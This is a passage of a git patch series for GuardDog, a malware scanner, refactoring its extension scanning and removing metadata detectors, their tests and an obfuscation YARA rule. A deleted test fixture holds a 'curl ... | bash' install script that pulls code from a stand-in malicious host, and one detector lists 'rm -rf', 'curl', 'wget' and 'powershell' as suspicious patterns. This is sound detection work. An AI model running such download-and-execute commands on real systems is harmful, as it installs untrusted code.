log.debug( + f"Successfully parsed package.json with {len(manifest_data)} keys") except (json.JSONDecodeError, IOError) as e: - log.warning(f"Failed to read manifest from {package_json_path}: {e}") + log.warning( + f"Failed to read manifest from {package_json_path}: {e}") return {} - - registered_commands = manifest_data.get("contributes", {}).get("commands", []) + + registered_commands = manifest_data.get( + "contributes", {}).get("commands", []) extracted_metadata = { "name": manifest_data.get("name", ""), "displayName": manifest_data.get("displayName", ""), @@ -166,31 +183,37 @@ def _extract_manifest_metadata(self, extracted_path: str) -> dict: "categories": manifest_data.get("categories", []), "registeredCommands": registered_commands, } - + log.debug(f"Extracted manifest metadata: {extracted_metadata}") return extracted_metadata - - def scan_local(self, path: str, rules=None) -> dict: + def scan_local(self, path: str, rules=None, callback: typing.Callable[[dict], None] = noop) -> dict: """ Scan a local VSCode extension directory - + Args: path: Path to extension directory containing package.json rules: Set of rules to use - + callback: Callback to apply to analyzer output + Returns: Scan results """ # Extract manifest metadata from the extension directory manifest_metadata = self._extract_manifest_metadata(path) - + # For local directory scanning, only use manifest metadata package_info = { "marketplace": {}, # Empty for local scans "manifest": manifest_metadata, "source": "local" } - - # Use the analyzer to scan the directory with the package info - return self.analyzer.analyze(path, package_info, rules) + + if rules is not None: + rules = set(rules) + + # Use full analyze method to include both metadata and sourcecode analysis + results = self.analyzer.analyze(path, package_info, rules) + callback(results) + + return results diff --git a/tests/analyzer/sourcecode/obfuscation.py b/tests/analyzer/sourcecode/obfuscation.py index 826e12b5..6b63f923 100644 --- a/tests/analyzer/sourcecode/obfuscation.py +++ b/tests/analyzer/sourcecode/obfuscation.py @@ -54,4 +54,4 @@ def f(): # ruleid: obfuscation exec(''.join(chr(c) for c in [112, 114, 105, 110, 116, 40, 34, 72, 101, 108, 108, 111, 44, 32, 119, 111, 114, 108, 100, 34, 41])) # ruleid: obfuscation - exec(''.join(map(chr, [112, 114, 105, 110, 116, 40, 34, 72, 101, 108, 108, 111, 44, 32, 119, 111, 114, 108, 100, 34, 41]))) + exec(''.join(map(chr, [112, 114, 105, 110, 116, 40, 34, 72, 101, 108, 108, 111, 44, 32, 119, 111, 114, 108, 100, 34, 41]))) \ No newline at end of file From 8e2cd4a6e712f7e44468ad2fb4d809324c8fb000 Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Thu, 17 Jul 2025 18:03:24 +0200 Subject: [PATCH 3/7] Remove metadata rules for now, default yara rules to all ecosystems, fix formatting :) --- README.md | 44 +-- guarddog/analyzer/analyzer.py | 84 ++--- guarddog/analyzer/metadata/__init__.py | 3 +- .../analyzer/metadata/extension/__init__.py | 18 -- .../metadata/extension/empty_information.py | 47 --- .../extension/suspicious_permissions.py | 132 -------- .../extension/suspicious_publisher.py | 71 ----- guarddog/analyzer/sourcecode/__init__.py | 28 +- .../extension_obfuscator_dot_io.yar | 30 -- guarddog/reporters/human_readable.py | 8 +- .../metadata/test_extension_metadata.py | 291 ------------------ 11 files changed, 45 insertions(+), 711 deletions(-) delete mode 100644 guarddog/analyzer/metadata/extension/__init__.py delete mode 100644 guarddog/analyzer/metadata/extension/empty_information.py delete mode 100644 guarddog/analyzer/metadata/extension/suspicious_permissions.py delete mode 100644 guarddog/analyzer/metadata/extension/suspicious_publisher.py delete mode 100644 guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar delete mode 100644 tests/analyzer/metadata/test_extension_metadata.py diff --git a/README.md b/README.md index c648f122..c4becf0c 100644 --- a/README.md +++ b/README.md @@ -6,9 +6,9 @@ GuardDog

-GuardDog is a CLI tool that allows to identify malicious PyPI and npm packages, Go modules, or VSCode extensions. It runs a set of heuristics on the package source code (through Semgrep rules) and on the package metadata. +GuardDog is a CLI tool that allows to identify malicious PyPI and npm packages, Go modules, GitHub actions, or VSCode extensions. It runs a set of heuristics on the package source code (through Semgrep rules) and on the package metadata. -GuardDog can be used to scan local or remote PyPI and npm packages, Go modules, or VSCode extensions using any of the available [heuristics](#heuristics). +GuardDog can be used to scan local or remote PyPI and npm packages, Go modules, GitHub actions, or VSCode extensions using any of the available [heuristics](#heuristics). It downloads and scans code from: @@ -173,9 +173,9 @@ Source code heuristics: | **Heuristic** | **Description** | |:-------------:|:---------------:| | shady-links | Identify when a package contains an URL to a domain with a suspicious extension | -| go-exec-base64 | Identify Base64-decoded content being passed to execution functions | -| go-exec-download | Identify Go code that downloads potentially executable files | -| go-exfiltrate-sensitive-data | Identify Go code that reads and exfiltrates sensitive| +| go-exec-base64 | Identify Base64-decoded content being passed to execution functions in Go | +| go-exfiltrate-sensitive-data | This rule identifies when a package reads and exfiltrates sensitive data from the local system. | +| go-exec-download | This rule downloads and executes a remote binary after setting executable permissions. | Metadata heuristics: @@ -186,9 +186,6 @@ Metadata heuristics: ### GitHub Action -For GitHub Actions that are implemented in JavaScript, -GuardDog will run the same source code heuristics as for npm packages. - Source code heuristics: | **Heuristic** | **Description** | @@ -202,37 +199,6 @@ Source code heuristics: | npm-steganography | Identify when a package retrieves hidden data from an image and executes it | | npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL | | npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system | - - -### VSCode Extensions - -For VSCode extensions that are implemented in JavaScript/TypeScript, -GuardDog will run the same source code heuristics as for npm packages, plus specialized YARA rules. - -Source code heuristics: - -| **Heuristic** | **Description** | -|:-------------:|:---------------:| -| npm-serialize-environment | Identify when a package serializes 'process.env' to exfiltrate environment variables | -| npm-obfuscation | Identify when a package uses a common obfuscation method often used by malware | -| npm-silent-process-execution | Identify when a package silently executes an executable | -| shady-links | Identify when a package contains an URL to a domain with a suspicious extension | -| npm-exec-base64 | Identify when a package dynamically executes code through 'eval' | -| npm-install-script | Identify when a package has a pre or post-install script automatically running commands | -| npm-steganography | Identify when a package retrieves hidden data from an image and executes it | -| npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL | -| npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system | -| extension_obfuscator_dot_io | Detect usage of obfuscator.io service patterns | -| extension_powershell_policy_bypass | Identify PowerShell execution policy bypass attempts | -| extension_suspicious_passwd_access_linux | Detect suspicious access to Linux password files | - -Metadata heuristics: - -| **Heuristic** | **Description** | -|:-------------:|:---------------:| -| empty_information | Identify extensions with an empty description field | -| suspicious-permissions | Identify extensions with potentially dangerous permissions or suspicious characteristics | -| suspicious-publisher | Identify extensions with suspicious publisher verification status and typosquatting | ## Custom Rules diff --git a/guarddog/analyzer/analyzer.py b/guarddog/analyzer/analyzer.py index 5c88e6b1..d4b9c2df 100644 --- a/guarddog/analyzer/analyzer.py +++ b/guarddog/analyzer/analyzer.py @@ -93,8 +93,7 @@ def analyze( sourcecode_results = None # populate results, errors, and number of issues - metadata_results = self.analyze_metadata( - path, info, rules, name, version) + metadata_results = self.analyze_metadata(path, info, rules, name, version) sourcecode_results = self.analyze_sourcecode(path, rules) # Concatenate dictionaries together @@ -102,16 +101,11 @@ def analyze( results = metadata_results["results"] | sourcecode_results["results"] errors = metadata_results["errors"] | sourcecode_results["errors"] - output = { + return { "issues": issues, "errors": errors, "results": results, "path": path} - # Including extension info - pending discussion - # if info is not None: - # output["package_info"] = info - - return output def analyze_metadata( self, @@ -148,8 +142,7 @@ def analyze_metadata( for rule in all_rules: try: log.debug(f"Running rule {rule} against package '{name}'") - rule_matches, message = self.metadata_detectors[rule].detect( - info, path, name, version) + rule_matches, message = self.metadata_detectors[rule].detect(info, path, name, version) results[rule] = None if rule_matches: issues += 1 @@ -209,11 +202,6 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: rule_results: defaultdict[dict, list[dict]] = defaultdict(list) - # Define verbose rules that should only show "file-level" triggers - verbose_rules = { - "DETECT_FILE_obfuscator_dot_io", - } - rules_path = { rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yar") for rule_name in all_rules @@ -233,54 +221,32 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: continue scan_file_target_abspath = os.path.join(root, f) - scan_file_target_relpath = os.path.relpath( - scan_file_target_abspath, path) + scan_file_target_relpath = os.path.relpath(scan_file_target_abspath, path) matches = scan_rules.match(scan_file_target_abspath) for m in matches: rule_name = m.rule - if rule_name in verbose_rules: - # For verbose rules, we only show that the rule was triggered in the matching file - # We're logging appearances once instead of - # issue-counting - file_already_reported = any( - finding["location"].startswith(scan_file_target_relpath + ":") - for finding in rule_results[rule_name] - ) - - if not file_already_reported: + for s in m.strings: + for i in s.instances: finding = { - "location": f"{scan_file_target_relpath}:1", - "code": f'{"Rule triggered in file (matches hidden for brevity)"}', - 'message': m.meta.get( - "description", - f"{rule_name} rule matched")} - issues += 1 + "location": f"{scan_file_target_relpath}:{i.offset}", + "code": self.trim_code_snippet(str(i.matched_data)), + 'message': m.meta.get("description", f"{rule_name} rule matched") + } + + # since yara can match the multiple times in the same file + # leading to finding several times the same word or pattern + # this dedup the matches + if [ + f + for f in rule_results[rule_name] + if finding["code"] == f["code"] + ]: + continue + + issues += len(m.strings) rule_results[rule_name].append(finding) - else: - # For non-verbose rules, show detailed matches as - # before - for s in m.strings: - for i in s.instances: - finding = { - "location": f"{scan_file_target_relpath}:{i.offset}", - "code": self.trim_code_snippet(str(i.matched_data)), - 'message': m.meta.get("description", f"{rule_name} rule matched") - } - - # since yara can match the multiple times in the same file - # leading to finding several times the same word or pattern - # this dedup the matches - if [ - f - for f in rule_results[rule_name] - if finding["code"] == f["code"] - ]: - continue - - issues += len(m.strings) - rule_results[rule_name].append(finding) except Exception as e: errors["rules-all"] = f"failed to run rule: {str(e)}" @@ -312,8 +278,7 @@ def analyze_semgrep(self, path, rules=None) -> dict: errors = {} issues = 0 - rules_path = list(map(lambda rule_name: os.path.join( - SOURCECODE_RULES_PATH, f"{rule_name}.yml"), all_rules)) + rules_path = list(map(lambda rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yml"), all_rules)) if len(rules_path) == 0: log.debug("No semgrep code rules to run") @@ -322,8 +287,7 @@ def analyze_semgrep(self, path, rules=None) -> dict: try: log.debug(f"Running semgrep code rules against {path}") response = self._invoke_semgrep(target=path, rules=rules_path) - rule_results = self._format_semgrep_response( - response, targetpath=targetpath) + rule_results = self._format_semgrep_response(response, targetpath=targetpath) issues += sum(len(res) for res in rule_results.values()) results = results | rule_results diff --git a/guarddog/analyzer/metadata/__init__.py b/guarddog/analyzer/metadata/__init__.py index 08f20894..8f2686ac 100644 --- a/guarddog/analyzer/metadata/__init__.py +++ b/guarddog/analyzer/metadata/__init__.py @@ -3,7 +3,6 @@ from guarddog.analyzer.metadata.pypi import PYPI_METADATA_RULES from guarddog.analyzer.metadata.go import GO_METADATA_RULES from guarddog.analyzer.metadata.github_action import GITHUB_ACTION_METADATA_RULES -from guarddog.analyzer.metadata.extension import EXTENSION_METADATA_RULES from guarddog.ecosystems import ECOSYSTEM @@ -18,4 +17,4 @@ def get_metadata_detectors(ecosystem: ECOSYSTEM) -> dict[str, Detector]: case ECOSYSTEM.GITHUB_ACTION: return GITHUB_ACTION_METADATA_RULES case ECOSYSTEM.EXTENSION: - return EXTENSION_METADATA_RULES + return {} # No metadata detectors for extensions currently diff --git a/guarddog/analyzer/metadata/extension/__init__.py b/guarddog/analyzer/metadata/extension/__init__.py deleted file mode 100644 index d47b7801..00000000 --- a/guarddog/analyzer/metadata/extension/__init__.py +++ /dev/null @@ -1,18 +0,0 @@ -from typing import Type - -from guarddog.analyzer.metadata import Detector -from guarddog.analyzer.metadata.extension.empty_information import ExtensionEmptyInfoDetector -from guarddog.analyzer.metadata.extension.suspicious_publisher import ExtensionSuspiciousPublisherDetector -from guarddog.analyzer.metadata.extension.suspicious_permissions import ExtensionSuspiciousPermissionsDetector - -EXTENSION_METADATA_RULES = {} - -classes: list[Type[Detector]] = [ - ExtensionEmptyInfoDetector, - ExtensionSuspiciousPublisherDetector, - ExtensionSuspiciousPermissionsDetector, -] - -for detectorClass in classes: - detectorInstance = detectorClass() # type: ignore - EXTENSION_METADATA_RULES[detectorInstance.get_name()] = detectorInstance diff --git a/guarddog/analyzer/metadata/extension/empty_information.py b/guarddog/analyzer/metadata/extension/empty_information.py deleted file mode 100644 index 3a2fc7e4..00000000 --- a/guarddog/analyzer/metadata/extension/empty_information.py +++ /dev/null @@ -1,47 +0,0 @@ -""" Empty Information Detector for Extensions - -Detects if an extension contains an empty description -""" -import logging -from typing import Optional - -from guarddog.analyzer.metadata.empty_information import EmptyInfoDetector - -log = logging.getLogger("guarddog") - - -class ExtensionEmptyInfoDetector(EmptyInfoDetector): - """Detects extensions with empty description information""" - - def detect(self, - package_info, - path: Optional[str] = None, - name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, - str]: - - log.debug( - f"Running extension empty description heuristic on extension {name} version {version}") - - if not package_info or not isinstance(package_info, dict): - return True, "Extension has no package information" - - manifest = package_info.get("manifest", {}) - marketplace = package_info.get("marketplace", {}) - source = package_info.get("source", "unknown") - - return self._detect_with_metadata(manifest, marketplace, source) - - def _detect_with_metadata(self, - manifest: dict, - marketplace: dict, - source: str) -> tuple[bool, - str]: - """Detect empty information with pre-extracted metadata""" - - manifest_description = manifest.get("description", "").strip() - manifest_display_name = manifest.get("displayName", "").strip() - - if not manifest_description and not manifest_display_name: - return True, self.MESSAGE_TEMPLATE % "Extension Marketplace (manifest)" - return False, "" diff --git a/guarddog/analyzer/metadata/extension/suspicious_permissions.py b/guarddog/analyzer/metadata/extension/suspicious_permissions.py deleted file mode 100644 index b94cf7af..00000000 --- a/guarddog/analyzer/metadata/extension/suspicious_permissions.py +++ /dev/null @@ -1,132 +0,0 @@ -from typing import Optional - -from guarddog.analyzer.metadata.detector import Detector - - -class ExtensionSuspiciousPermissionsDetector(Detector): - """Detects extensions with suspicious permissions or capabilities""" - - def __init__(self): - super().__init__(name="suspicious-permissions", - description="Identify extensions with potentially" - "dangerous permissions or suspicious characteristics") - - def detect(self, - package_info, - path: Optional[str] = None, - name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, - Optional[str]]: - - if not package_info or not isinstance(package_info, dict): - return False, None - - manifest = package_info.get("manifest", {}) - marketplace = package_info.get("marketplace", {}) - source = package_info.get("source", "unknown") - - return self._detect_with_metadata(manifest, marketplace, source) - - def _detect_with_metadata(self, - manifest: dict, - marketplace: dict, - source: str) -> tuple[bool, - Optional[str]]: - - # Check manifest for suspicious activation events - activation_events = manifest.get("activationEvents", []) - suspicious_activations = [] - - for event in activation_events: - if isinstance(event, str): - # Very broad activation events that could be suspicious - if event == "*": - suspicious_activations.append(event) - elif "onFileSystem:" in event and "*" in event: - suspicious_activations.append(event) - - if suspicious_activations: - return True, f"Extension uses suspicious activation events: {', '.join(suspicious_activations)}" - - # Check for suspicious scripts in manifest - scripts = manifest.get("scripts", {}) - if scripts: - suspicious_script_patterns = [ - 'rm -rf', - 'del /s', - 'format', - 'shutdown', - 'curl', - 'wget', - 'powershell'] - for script_name, script_content in scripts.items(): - if isinstance(script_content, str): - for pattern in suspicious_script_patterns: - if pattern in script_content.lower(): - return True, f"Extension has suspicious script '{script_name}': contains '{pattern}'" - - dependencies = manifest.get("dependencies", {}) - dev_dependencies = manifest.get("devDependencies", {}) - all_deps = {**dependencies, **dev_dependencies} - - # The list is NOT exhaustive, adjust as needed - suspicious_deps = ['child_process', 'fs-extra', 'shelljs', 'node-pty'] - found_suspicious_deps = [ - dep for dep in all_deps.keys() if any( - sus in dep for sus in suspicious_deps)] - - if found_suspicious_deps: - return True, f"Extension uses potentially dangerous dependencies: {', '.join(found_suspicious_deps[:3])}" - - if marketplace and source == "remote": - download_count = marketplace.get("download_count", 0) - # Check if publisher is not verified but has high privileges - publisher_info = marketplace.get("publisher", {}) - if isinstance(publisher_info, dict): - flags = publisher_info.get("flags", []) - is_verified = any("verified" in str(flag).lower() - for flag in flags) if flags else False - is_domain_verified = marketplace.get( - "publisher_isDomainVerified", False) - - # Suspicious: unverified publisher with low download count - if not is_verified and not is_domain_verified and download_count < 1000: - return True, "Extension from unverified publisher with low download count" - - if flags: - flag_strings = [str(flag).lower() for flag in flags] - # malware might unnecessary since extensions are swiftly - # removed from the marketplace - suspicious_flag_patterns = [ - 'preview', 'deprecated', 'malware'] - found_suspicious_flags = [ - flag for flag in flag_strings if any( - pattern in flag for pattern in suspicious_flag_patterns)] - if found_suspicious_flags: - return True, f"Extension has suspicious marketplace flags: {', '.join(found_suspicious_flags)}" - - contributes = manifest.get("contributes", {}) - if contributes: - # Check for dangerous contribution points - if contributes.get("terminal"): - return True, "Extension contributes terminal functionality which could be dangerous" - - if contributes.get("taskDefinitions"): - return True, "Extension contributes task definitions which could execute arbitrary commands" - - # Will add typosquatting checks for most used commands - - # Check categories for suspicious types - categories = manifest.get("categories", []) - if categories: - suspicious_categories = [ - 'debuggers', 'other', 'testing', 'snippets'] - category_strings = [str(cat).lower() for cat in categories] - found_suspicious_cats = [ - cat for cat in category_strings if any( - sus in cat for sus in suspicious_categories)] - if found_suspicious_cats and len(categories) == 1: - # Only flag if it's the sole category - return True, f"Extension has potentially suspicious sole category: {found_suspicious_cats[0]}" - - return False, None diff --git a/guarddog/analyzer/metadata/extension/suspicious_publisher.py b/guarddog/analyzer/metadata/extension/suspicious_publisher.py deleted file mode 100644 index 8fc82109..00000000 --- a/guarddog/analyzer/metadata/extension/suspicious_publisher.py +++ /dev/null @@ -1,71 +0,0 @@ -from typing import Optional - -from guarddog.analyzer.metadata.detector import Detector - - -class ExtensionSuspiciousPublisherDetector(Detector): - """Detects extensions with suspicious publisher characteristics""" - - def __init__(self): - super().__init__(name="suspicious-publisher", - description="Identify extensions with suspicious" - "publisher verification status and typosquatting") - - def detect(self, - package_info, - path: Optional[str] = None, - name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, - Optional[str]]: - - if not package_info or not isinstance(package_info, dict): - return False, None - - manifest = package_info.get("manifest", {}) - marketplace = package_info.get("marketplace", {}) - source = package_info.get("source", "unknown") - - return self._detect_with_metadata( - manifest, marketplace, source, package_info) - - def _detect_with_metadata(self, - manifest: dict, - marketplace: dict, - source: str, - package_info: dict) -> tuple[bool, - Optional[str]]: - """Detect suspicious publisher patterns with pre-extracted metadata""" - - manifest_publisher = manifest.get("publisher", "").strip() - - if not manifest_publisher: - return False, None # Already handled by empty-information detector - - # TODO: Check for typosquatting using the dedicated detector - - verification_info = [] - if marketplace and source == "remote": - publisher_info = marketplace.get("publisher", {}) - - if isinstance(publisher_info, dict): - # Check if publisher is verified (positive information) - flags = publisher_info.get("flags", []) - is_verified = any("verified" in str(flag).lower() - for flag in flags) if flags else False - - if is_verified: - verification_info.append("Publisher is verified") - - # Check if publisher domain is verified (positive information) - is_domain_verified = marketplace.get( - "publisher_isDomainVerified", False) - if is_domain_verified: - verification_info.append("Publisher domain is verified") - - # If we have positive verification information, include it in a non-suspicious way - # This doesn't return True (not suspicious) but provides information - # until more robust heuristics are implemented - if verification_info: - pass - - return False, None diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index 72918c1d..ad00f8aa 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -99,11 +99,7 @@ def get_sourcecode_rules( SempgrepRule( id=rule["id"], ecosystem=ecosystem, - description=rule.get( - "metadata", - {}).get( - "description", - ""), + description=rule.get("metadata", {}).get("description", ""), file=file_name, rule_content=rule, )) @@ -117,18 +113,22 @@ def get_sourcecode_rules( rule_id = pathlib.Path(file_name).stem description_regex = fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' - # Default to EXTENSION for general YARA rules (can be adjusted as when - # other ecosystems are supported) - rule_ecosystem = ECOSYSTEM.EXTENSION + rule_ecosystems = [] + if file_name.startswith("extension_"): + rule_ecosystems = [ECOSYSTEM.EXTENSION] + else: + # If no specific ecosystem prefix, default to all ecosystems + rule_ecosystems = [ECOSYSTEM.PYPI, ECOSYSTEM.NPM, ECOSYSTEM.GO, ECOSYSTEM.GITHUB_ACTION, ECOSYSTEM.EXTENSION] with open(os.path.join(current_dir, file_name), "r") as fd: match = re.search(description_regex, fd.read()) rule_description = "" if match: rule_description = match.group(1) - SOURCECODE_RULES.append(YaraRule( - id=rule_id, - file=file_name, - description=rule_description, - ecosystem=rule_ecosystem - )) + for ecosystem in rule_ecosystems: + SOURCECODE_RULES.append(YaraRule( + id=rule_id, + file=file_name, + description=rule_description, + ecosystem=ecosystem + )) diff --git a/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar b/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar deleted file mode 100644 index f66cc1a7..00000000 --- a/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar +++ /dev/null @@ -1,30 +0,0 @@ -rule DETECT_FILE_obfuscator_dot_io -{ - meta: - - author = "T HAMDOUNI, Datadog" - description = "Detects Javascript code obfuscated with obfuscator.io. Note that although malicious code is often obfuscated, there are legitimate use cases including protecting intellectual property or preventing reverse engineering." - - strings: - $id1 = /(^|[^A-Za-z0-9])_0x[a-f0-9]{4,8}/ ascii - $id2 = /(^|[^A-Za-z0-9])a0_0x[a-f0-9]{4,8}/ ascii - - $rot_push = "['push'](_0x" ascii - $rot_shift = "['shift']()" ascii - $loop1 = /while\s*\(\!\!\[\]\)/ - - $def1 = "Function('return\\x20(function()\\x20'+'{}.constructor(\\x22return\\x20this\\x22)(" ascii - $def2 = "{}.constructor(\"return this\")(" ascii - $def3 = "{}.constructor(\\x22return\\x20this\\x22)(\\x20)" base64 - - $tok2 = /parseInt\(_0x[a-f0-9]{4,8}\(0x[a-f0-9]+\)\)/ ascii nocase // strong indicator - - condition: - filesize < 5MB and - ( - ( (#id1 + #id2) >= 6 ) or - ( ( $rot_push and $rot_shift ) or $loop1 ) or - ( any of ($def*) or #tok2 > 5 ) - ) - -} diff --git a/guarddog/reporters/human_readable.py b/guarddog/reporters/human_readable.py index 9cd59ce6..dd519a3d 100644 --- a/guarddog/reporters/human_readable.py +++ b/guarddog/reporters/human_readable.py @@ -74,13 +74,7 @@ def _format_code_line_for_output(code) -> str: for finding in findings: description = findings[finding] if isinstance(description, str): # package metadata - lines.append( - colored( - finding, - None, - attrs=["bold"]) - + ": " - + description) + lines.append(colored(finding, None, attrs=["bold"]) + ": " + description) lines.append("") elif isinstance(description, list): # semgrep rule result: source_code_findings = description diff --git a/tests/analyzer/metadata/test_extension_metadata.py b/tests/analyzer/metadata/test_extension_metadata.py deleted file mode 100644 index b22d74b5..00000000 --- a/tests/analyzer/metadata/test_extension_metadata.py +++ /dev/null @@ -1,291 +0,0 @@ -import pytest - -from guarddog.analyzer.metadata.extension.empty_information import ExtensionEmptyInfoDetector -from guarddog.analyzer.metadata.extension.suspicious_permissions import ExtensionSuspiciousPermissionsDetector -from guarddog.analyzer.metadata.extension.suspicious_publisher import ExtensionSuspiciousPublisherDetector - - -class TestExtensionEmptyInfoDetector: - detector = ExtensionEmptyInfoDetector() - - def test_no_package_info(self): - matches, message = self.detector.detect(None) - assert matches - assert "no package information" in message - - def test_empty_manifest(self): - package_info = { - "manifest": { - "name": "test-extension", - "description": "", - "displayName": "" - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert "Extension Marketplace (manifest)" in message - - def test_non_empty_manifest_local(self): - package_info = { - "manifest": { - "name": "test-extension", - "description": "A useful extension", - "displayName": "Test Extension" - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches - - -class TestExtensionSuspiciousPermissionsDetector: - detector = ExtensionSuspiciousPermissionsDetector() - - def test_no_package_info(self): - matches, message = self.detector.detect(None) - assert not matches - assert message is None - - def test_wildcard_activation_event(self): - package_info = { - "manifest": { - "activationEvents": ["*"] - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "suspicious activation events" in message - assert "*" in message - - def test_suspicious_filesystem_activation(self): - package_info = { - "manifest": { - "activationEvents": ["onFileSystem:*"] - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "suspicious activation events" in message - assert "onFileSystem:*" in message - - def test_safe_activation_events(self): - package_info = { - "manifest": { - "activationEvents": ["onCommand:myextension.hello", "onLanguage:python"] - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches - - def test_suspicious_script_rm_rf(self): - package_info = { - "manifest": { - "scripts": { - "postinstall": "rm -rf /tmp/something" - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "suspicious script" in message - assert "rm -rf" in message - - def test_suspicious_script_curl(self): - package_info = { - "manifest": { - "scripts": { - "install": "curl http://malicious.com/script.sh | bash" - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "suspicious script" in message - assert "curl" in message - - def test_safe_scripts(self): - package_info = { - "manifest": { - "scripts": { - "compile": "tsc", - "test": "mocha" - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches - - def test_suspicious_dependencies(self): - package_info = { - "manifest": { - "dependencies": { - "child_process": "^1.0.0", - "lodash": "^4.0.0" - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "dangerous dependencies" in message - assert "child_process" in message - - def test_safe_dependencies(self): - package_info = { - "manifest": { - "dependencies": { - "lodash": "^4.0.0", - "axios": "^0.21.0" - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches - - def test_unverified_publisher_low_downloads(self): - package_info = { - "manifest": {}, - "marketplace": { - "download_count": 500, - "publisher": { - "flags": [] - }, - "publisher_isDomainVerified": False - }, - "source": "remote" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "unverified publisher" in message - assert "low download count" in message - - def test_verified_publisher_high_downloads(self): - package_info = { - "manifest": {}, - "marketplace": { - "download_count": 100000, - "publisher": { - "flags": ["verified"] - }, - "publisher_isDomainVerified": True - }, - "source": "remote" - } - matches, message = self.detector.detect(package_info) - assert not matches - - def test_terminal_contribution(self): - package_info = { - "manifest": { - "contributes": { - "terminal": { - "profiles": ["custom-terminal"] - } - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "terminal functionality" in message - - def test_task_definitions_contribution(self): - package_info = { - "manifest": { - "contributes": { - "taskDefinitions": [ - { - "type": "custom-task" - } - ] - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "task definitions" in message - - - def test_suspicious_sole_category(self): - package_info = { - "manifest": { - "categories": ["Debuggers"] - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "suspicious sole category" in message - assert "debuggers" in message - - def test_multiple_categories_with_suspicious(self): - package_info = { - "manifest": { - "categories": ["Debuggers", "Machine Learning", "Testing"] - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches # Should not flag because multiple categories - -class TestExtensionSuspiciousPublisherDetector: - detector = ExtensionSuspiciousPublisherDetector() - - def test_no_package_info(self): - matches, message = self.detector.detect(None) - assert not matches - assert message is None - - def test_empty_publisher(self): - package_info = { - "manifest": { - "publisher": "" - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches # Handled by empty-information detector - - def test_valid_publisher_local(self): - package_info = { - "manifest": { - "publisher": "microsoft" - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches From 2564a615804ce9f3c0fe50f78d36fd1014e055fb Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Fri, 18 Jul 2025 15:43:53 +0200 Subject: [PATCH 4/7] nits ... --- guarddog/analyzer/analyzer.py | 20 +++------ guarddog/analyzer/sourcecode/__init__.py | 30 ++++++------- guarddog/scanners/extension_scanner.py | 55 +++++++++++------------- 3 files changed, 47 insertions(+), 58 deletions(-) diff --git a/guarddog/analyzer/analyzer.py b/guarddog/analyzer/analyzer.py index d4b9c2df..7d294bac 100644 --- a/guarddog/analyzer/analyzer.py +++ b/guarddog/analyzer/analyzer.py @@ -225,14 +225,13 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: matches = scan_rules.match(scan_file_target_abspath) for m in matches: - rule_name = m.rule for s in m.strings: for i in s.instances: finding = { "location": f"{scan_file_target_relpath}:{i.offset}", "code": self.trim_code_snippet(str(i.matched_data)), - 'message': m.meta.get("description", f"{rule_name} rule matched") + 'message': m.meta.get("description", f"{m.rule} rule matched") } # since yara can match the multiple times in the same file @@ -240,13 +239,13 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: # this dedup the matches if [ f - for f in rule_results[rule_name] + for f in rule_results[m.rule] if finding["code"] == f["code"] ]: continue issues += len(m.strings) - rule_results[rule_name].append(finding) + rule_results[m.rule].append(finding) except Exception as e: errors["rules-all"] = f"failed to run rule: {str(e)}" @@ -278,7 +277,8 @@ def analyze_semgrep(self, path, rules=None) -> dict: errors = {} issues = 0 - rules_path = list(map(lambda rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yml"), all_rules)) + rules_path = list(map( + lambda rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yml"), all_rules)) if len(rules_path) == 0: log.debug("No semgrep code rules to run") @@ -299,9 +299,7 @@ def analyze_semgrep(self, path, rules=None) -> dict: def 